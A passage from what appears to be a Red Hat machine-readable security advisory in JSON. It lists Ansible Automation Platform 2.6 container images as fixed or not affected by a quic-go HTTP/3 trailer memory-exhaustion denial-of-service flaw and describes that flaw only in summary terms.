"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial-of-service flaw in `quic-go` that allows a remote attacker to exhaust system memory by sending specially crafted HTTP/3 trailer fields. This can lead to crashes or resource unavailability in affected Red Hat products utilizing `quic-go` for HTTP/3 communication, impacting both client and server implementations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
